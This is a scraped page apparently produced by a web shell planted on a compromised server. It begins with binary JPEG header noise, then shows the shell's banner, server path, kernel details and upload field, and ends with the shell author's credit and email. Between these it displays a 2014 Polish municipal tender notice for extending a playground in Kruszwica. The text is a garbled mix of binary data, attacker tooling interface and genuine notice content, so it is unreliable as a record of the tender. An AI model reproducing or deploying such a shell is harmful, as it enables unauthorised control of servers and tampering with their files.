JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140424/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140424/138628-N-2014.html

<p class="kh_header"><b>Kruszwica: Rozbudowa istniejącego placu zabaw o elementy małej infrastruktury na Półwyspie Rzępowskim w Kruszwicy</b><br>
<b>Numer ogłoszenia: 138628 - 2014; data zamieszczenia: 24.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Kruszwica , ul. Nadgoplańska 4, 88-150 Kruszwica, woj. kujawsko-pomorskie, tel. 52 3515010, faks 52 3516021.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.kruszwica.gmina.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rozbudowa istniejącego placu zabaw o elementy małej infrastruktury na Półwyspie Rzępowskim w Kruszwicy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamawiający: Gmina Kruszwica za pośrednictwem Urzędu Miejskiego w Kruszwicy
Termin realizacji: 60 dni kalendarzowych licząc od dnia zawarcia umowy

Przedmiot zamówienia:  
Opis i zakres prac przedstawiony jest w dokumentacji projektowej:
- Projekt budowlano - wykonawczy /Rozbudowa istniejącego placu zabaw o elementy małej infrastruktury na Półwyspie Rzępowskim w Kruszwicy/, opracowany przez firmę Produkcyjno - Usługowo - Handlową /VITARO/ z Radomska;
- Specyfikacja Techniczna Wykonania i Odbioru Robót Budowlanych dla zadania pn. /Rozbudowa istniejącego placu zabaw o elementy małej infrastruktury na Półwyspie Rzępowskim w Kruszwicy/, opracowany przez firmę Produkcyjno - Usługowo - Handlową /VITARO/ z Radomska.
Powyższa dokumentacja zawiera zakres szerszy niż przewiduje przedmiot zamówienia.
Przedmiotem zamówienia jest rozbudowa istniejącego placu zabaw o elementy małej infrastruktury zlokalizowanym na Półwyspie Rzępowskim w Kruszwicy, na działce nr 253 Kruszwica obręb 2.
Przedmiot zamówienia obejmuje następujące elementy: 
1/ Obsługa geodezyjna (wytyczenie terenu inwestycji, geodezja powykonawcza);
2/ Przygotowanie terenu pod inwestycję;
3/ Budowa placu zabaw; 
4/ Budowa nawierzchni piaskowej placu zabaw pod urządzeniami o wysokości swobodnego upadku powyżej 1m;
5/ Budowa ogrodzenia panelowego o wysokości min. 1,10 m wraz z trzema furtkami w kolorze zielonym. 
7/ Montaż elementów małej architektury - wyposażenia placu zabaw: 
- Huśtawka wahadłowa podwójna z jednym siedziskiem płaskim, drugim siedziskiem kubełkowym o wymiarach (wys. x dł. x szer.) 2,35 x 4,10 x 2,15 m. Urządzenie wykonane z drewna klejonego min. 5 warstwowo o przekroju min. 95 x 95 mm o zaoblonych krawędziach, frezowanego wzdłużnie. Belka pozioma stalowa - malowana proszkowo. Montaż urządzenia do gruntu na stalowych kotwach. Elementy drewniane malowane impregnatem koloryzującym. Łańcuchy wykonane ze stali nierdzewnej. 
- Huśtawka pojedyncza bocianie gniazdo o wymiarach (wys. x dł. x szer.) 2,35 x 4,10 x 2,15 m. Urządzenie wykonane z drewna klejonego min. 5 warstwowo o przekroju min. 95 x 95 mm o zaoblonych krawędziach, frezowanego wzdłużnie. Belka pozioma stalowa - malowana proszkowo. Montaż urządzenia do gruntu na stalowych kotwach. Elementy drewniane malowane impregnatem koloryzującym. Łańcuchy wykonane ze stali nierdzewnej.
- Huśtawka wagowa z podstawą metalową o wymiarach (wys. x dł. x szer.) 1,00 x 0,50 x 3,00 m. Urządzenie wykonane z drewna klejonego min. 5 warstwowo o przekroju min. 95 x 95 mm o zaoblonych krawędziach, frezowanego wzdłużnie. Podstawa wykonana w całości z metalu - malowana proszkowo. Siedziska wykonane z tworzywa sztucznego barwionego w masie grubości min. 16 mm. Uchwyty wykonane z rury - malowanej proszkowo.
- Bujak (2szt.) o wymiarach (wys. x dł. x szer.) 0,90 x 0,35 x 0,70 m. Korpus bujaczków wykonany z tworzywa barwionego w masie typu HDPE grubości min. 12 mm. Bajaczki zamontowane na stalowej malowanej proszkowo sprężynie. Wzór bujaka do uzgodnienia z Zamawiającym.
- Zestaw zabawowy duży o wymiarach (wys. x dł. x szer.) 3,10 x 9,20 x 6,20 m. Zestaw składający się domku z ławeczkami i dachem dwuspadowym, wieży bez dachu, ślizgu krótkiego, pomostu ruchomego, podestów stałych wielopoziomowych (4szt.), trapów wejściowych (2 szt.), balustrad pełnych (6 szt.) i trapu wejściowego (2szt.), łączników metalowych (4szt.), chorągiewki, modułu kółka i krzyżyk. Urządzenie wykonane z drewna klejonego min. 5 warstwowo o przekroju min. 95 x 95 mm o zaoblonych krawędziach, frezowanego wzdłużnie. Montaż urządzenia do gruntu na stalowych - malowanych proszkowo kotwach. Elementy drewniane malowane impregnatem koloryzującym. Daszek wykonany z tworzywa barwionego w masie polistyrenu spienionego lub HDPE grubości min. 10 mm w czterech różnych kolorach (daszek różnokolorowy), dzięki czemu nie wymaga żadnej konserwacji, malowania itp. Balustrady wykonane z tworzywa barwionego w masie polistyrenu spienionego lub HDPE grubości min. 20 mm. Poręcze pomostu ruchomego wykonane z metalowych rurek malowanych proszkowo. Ślizg krótki w całości wykonany ze stali nierdzewnej tj. zjazd, boczki, burty, dzięki czemu zagwarantowana jest najwyższa jakość oraz brak konserwacji.
Urządzenie wykonane z drewna klejonego o przekroju min. 45 x 95 mm o zaoblonych krawędziach, frezowanego wzdłużnie. Siedziska wykonane z tworzywa barwionego w masie polistyrenu spienionego lub HDPE o grubości min. 12 mm dzięki czemu nie wymagają żadnej konserwacji. 
- Zjeżdżalnia o wymiarach (wys. x dł. x szer.) 3,20 x 4,20 x 1,10 m. Zestaw składający się z wieży z daszkiem dwuspadowym, trapu wejściowego, ślizgu krótkiego, trapu wejściowego i balustrad (2 szt.). Urządzenie wykonane z drewna klejonego min. 5 warstwowo o przekroju min. 95 x 95 mm o zaoblonych krawędziach, frezowanego wzdłużnie. Montaż urządzenia do gruntu na stalowych - malowanych proszkowo kotwach. Elementy drewniane malowane impregnatem koloryzującym. Daszek wykonany z tworzywa barwionego w masie polistyrenu spienionego lub HDPE grubości min. 10 mm w czterech różnych kolorach (daszek różnokolorowy), dzięki czemu nie wymaga żadnej konserwacji, malowania itp. Balustrady wykonane z tworzywa barwionego w masie polistyrenu spienionego lub HDPE grubości min. 20 mm. Ślizg krótki w całości wykonany ze stali nierdzewnej tj. zjazd, boczki, burty, dzięki czemu zagwarantowana jest najwyższa jakość oraz brak konserwacji.
- Zestaw zabawowy mały o wymiarach (wys. x dł. x szer.) 2,50 x 3,60 x 3,00 m. Zestaw składający się z platformy, rury strażackiej, ścianki wspinaczkowej, drabinki pionowej wejściowej (2 szt.), piaskownicy z siedziskami w narożnikach, koparki, balustrady (4 szt.). Urządzenie wykonane z drewna klejonego min. 5 warstwowo o przekroju min. 95 x 95 mm o zaoblonych krawędziach, frezowanego wzdłużnie. Montaż urządzenia do gruntu na stalowych - malowanych proszkowo kotwach. Elementy drewniane malowane impregnatem koloryzującym. Balustrady wykonane z tworzywa barwionego w masie polistyrenu spienionego lub HDPE grubości min. 20 mm. Ślizg krótki w całości wykonany ze stali nierdzewnej tj. zjazd, boczki, burty, dzięki czemu zagwarantowana jest najwyższa jakość oraz brak konserwacji. 
- Regulamin o wymiarach (wys. x dł. x szer.) 2,10 x 0,75 x 0,20 m. Regulamin wykonany z drewna klejonego min. 5 warstwowo o przekroju min. 95 x 95 mm o zaoblonych krawędziach, frezowanego wzdłużnie. Montaż urządzenia do gruntu na stalowych - malowanych proszkowo kotwach. Daszek wykonany z tworzywa barwionego w masie polistyrenu spienionego lub HDPE grubości min. 12 mm.
- Ławki (4szt.) o konstrukcji nośnej wykonanej z żeliwa na stałe związane z gruntem - siedzisko i oparcie wykonane z listew barwionych w masie polistyrenu spienionego o wymiarach minimum 120 x 37 x 1500 mm z ekologicznego materiał, który nie wymaga konserwacji, malowania, impregnacji, jest odporny na zarysowania. Listwy ławki z polistyrenu muszą posiadać aktualny atest higieniczny wydany przez PZH w Warszawie.
- Kosz na śmieci stalowe malowane farbami proszkowymi (4szt.).
- Stół 4-osobowy drewniany z ławkami (3 kpl.). 
Wymagania dotyczące wyposażenia placu zabaw: 
- Urządzenia zabawowe powinny być ciekawe i estetyczne, trwałe i bezpieczne. Wszystkie zainstalowane sprzęty powinny spełniać wymogi Polskich Norm PN-EN 1176 oraz PN-EN 1177 oraz posiadać aktualne certyfikaty bezpieczeństwa wydane przez akredytowane jednostki certyfikujące. Certyfikaty muszą dotyczyć poszczególnych, konkretnych urządzeń rekreacyjno zabawowych, nie mogą dotyczyć systemu urządzeń. Ponadto powinny być objęte minimum 3 letnim okresem gwarancji. Dopuszcza się zabawki różnych producentów przy zachowaniu określonych minimalnych wymiarów, materiałów i funkcji zabawki oraz minimalnego składu zestawu zabawowego i pozostałych urządzeń. Zabawki powinny wyglądem przypominać przedstawione wizualizacje zamieszczone w dokumentacji projektowej.
- W przypadku, gdy w SIWZ lub załącznikach wskazano znaki towarowe, patent, pochodzenie materiałów lub urządzeń należy przyjąć, iż to są wskazania przykładowe. Zamawiający dopuszcza proponowanie innych materiałów i urządzeń, pod warunkiem, że zagwarantują one realizacje zamówienia zgodnie z zapisami SIWZ i załącznikami oraz zapewnią uzyskanie parametrów technologicznych i jakościowych oraz standardu wykonania nie gorszych od założonych w w/w dokumentach. 
 Wytyczne dla Wykonawców:
-Podstawą do wyceny jest projekt budowlany, opracowanie graficzne, STWiOR. Przedmiary robót należy traktować jako element pomocniczy. 
-W cenie ofertowej należy uwzględnić wszystkie koszty związane z realizacją inwestycji, w tym koszty konsultacji i bieżących uzgodnień z właścicielami poszczególnych sieci czy wszelkie opłaty za przygotowanie i zabezpieczenie miejsca robót w trakcie realizacji zadania;
-Wykonawca odpowiada za ochronę instalacji na powierzchni ziemi i za urządzenia podziemne takie jak rurociągi, kable itp. oraz uzyska od odpowiednich gestorów będących właścicielami tych urządzeń potwierdzenie informacji dostarczonych mu przez Zamawiającego w ramach planu lokalizacji. Wykonawca zapewni właściwe oznaczenie 
i zabezpieczenie przed uszkodzeniem tych instalacji i urządzeń w czasie trwania budowy. Wykonawca będzie odpowiadać za wszelkie spowodowane przez jego działania uszkodzenia instalacji na powierzchni ziemi i urządzeń podziemnych wykazanych w dokumentach dostarczonych mu przez Zamawiającego.
-Obowiązuje wynagrodzenie ryczałtowe (przedmiary robót są elementem pomocniczym).
-Nie dopuszcza się płatności częściowych w trakcie realizacji robót budowlanych. 
-Podstawą do rozliczenia robót będzie protokół odbioru robót, faktura Vat (rachunek)..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Do 50 % wartości zamówienia podstawowego i polegające na powtórzeniu tego samego rodzaju zamówienia.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 37.53.52.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 60.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> NIE DOTYCZY</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że wykonawca spełnia warunek dysponowania osobami zdolnymi do wykonania zamówienia, jeśli wykaże, że będzie dysponował osobami posiadającymi uprawnienia budowlane określone przepisami ustawy z dnia 7 lipca 1994 r Prawo budowlane (tj. Dz.U 2010, Nr 243, poz.1623 ze zm.) do kierowania robotami budowlanymi w specjalnościach wynikających z zakresu przedmiotowego zamówienia tj.:
-kierownik robót  specjalności konstrukcyjno- budowlanej</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że wykonawca spełnia warunek dotyczący znajdowania się w odpowiedniej sytuacji finansowej i ekonomicznej, jeśli Wykonawca przedstawi opłaconą polisę a w przypadku jej braku inny dokument potwierdzający, ze Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, o wartości co najmniej 50 000,00 zł (pięćdziesiąt tysięcy 00/100 PLN),</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">W celu wykazania, że oferowane urządzenia spełniają wymagania określone przez Zamawiającego, Wykonawca załączy do oferty:
- kartę techniczną danego urządzenia wraz ze zdjęciem oferowanego urządzenia
-certyfikat zgodności z normą PN EN 1176 ( lub równoważny) wydany przez akredytowane jednostki certyfikujące typu COBRABID, TUV, INT itp. na każde urządzenie - certyfikaty muszą dotyczyć poszczególnych konkretnych urządzeń zabawowych, nie mogą dotyczyć systemu urządzeń, (w przypadku zestawów urządzeń dopuszcza się przedstawienie certyfikatu osobno dla piaskownicy i osobno dla pozostałej części urządzenia),</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>oświadczenie o spełnianiu warunków udziału, formularz oferty, pełnomocnictwo jeśli dotyczy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian Zamawiający dopuszcza możliwość zmiany umowy: 1.w przypadku nie wykonania części przedmiotu umowy Zamawiający może pomniejszyć należne Wykonawcy wynagrodzenie na podstawie cen jednostkowych zawartych w kosztorysie ofertowym Wykonawcy, 2.w przypadkach określonych w § 17 ust. 1, § 5 ust. 1-3.tj.1)Zamawiający dopuszcza dokonanie zmiany terminu wykonania przedmiotu zamówienia przez Wykonawcę jeśli będzie konieczny dodatkowy czas na wykonanie robót budowlanych, w przypadku: -zmiany dokumentacji projektowej lub/i specyfikacji technicznych, o których mowa w § 5 ust.1-3 umowy, -udokumentowanych opóźnień niezależnych od Wykonawcy, -siły wyższej. 1. Jeżeli pomimo zachowania przez Zamawiającego należytej staranności w wykonaniu dokumentacji projektowej zostaną w niej wykryte wady, Zamawiający w porozumieniu z autorem dokumentacji doprowadzi do ich usunięcia i uzgodni z Wykonawcą sposób wykonania robót budowlanych wynikający ze zmian tej dokumentacji. Skutki finansowe dokonanych zmian obciążają Zamawiającego. 2. Zamawiający przewiduje również możliwość dokonania zmiany dokumentacji projektowej i specyfikacji technicznych na skutek aktualizacji rozwiązań projektowych z uwagi na postęp technologiczny lub zmiany obowiązujących przepisów oraz zmiany wynikające z zapewnienia lepszej eksploatacji, leżące w interesie publicznym czy poprawiające jakość użytkową inwestycji. W takim przypadku Zamawiający w porozumieniu z autorem dokumentacji doprowadzi do zmiany dokumentacji projektowej i specyfikacji technicznych oraz jeżeli będzie to konieczne do zmiany dokumentów wynikających z przepisów budowlanych i uzgodni z Wykonawcą sposób wykonania robót budowlanych wynikający ze zmian tej dokumentacji. 3. Podstawę obliczenia kosztów zmiany, o której mowa w ust. 2 stanowi zmieniona dokumentacja projektowa i specyfikacje techniczne oraz zamienny kosztorys ofertowy opracowany na podstawie cen jednostkowych zawartych w kosztorysie ofertowym Wykonawcy lub, jeżeli dla danych robót nie ma cen jednostkowych w tym kosztorysie ofertowym, dane wyjściowe do kosztorysowania przyjęte do sporządzania kosztorysu ofertowego Wykonawcy, ceny jednostkowe sprzętu i materiałów zaproponowane przez Wykonawcę, ale nie większe niż średnie ceny katalogowe dla kwartału poprzedzającego termin wykonania robót budowlanych. oraz w:3.w sytuacji zmiany lub rezygnacji z podwykonawcy, na którego zasoby wykonawca powołał się na zasadach określonych w art. 26 ust. 2b ustawy Prawo zamówień publicznych, wykonawca jest obowiązany wykazać zamawiającemu iż proponowany inny podwykonawca lub wykonawca samodzielnie spełnia warunek w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.kruszwica.gmina.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Siedziba Zamawiającego:Urząd Miejski w Kruszwicy, ul.Nadgoplańska 4, 88-150 Kruszwica, pokój nr 28.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.05.2014 godzina 10:00, miejsce: Siedziba Zamawiającego:Urząd Miejski w Kruszwicy, ul.Nadgoplańska 4, 88-150 Kruszwica, pokój nr 30 (biuro obsługi interesanta).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt przeznaczony do  dofinansowania w ramach działania /Wdrażanie lokalnych strategii rozwoju/ , objętego Programem Rozwoju Obszarów Wiejskich na lata 2007-2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com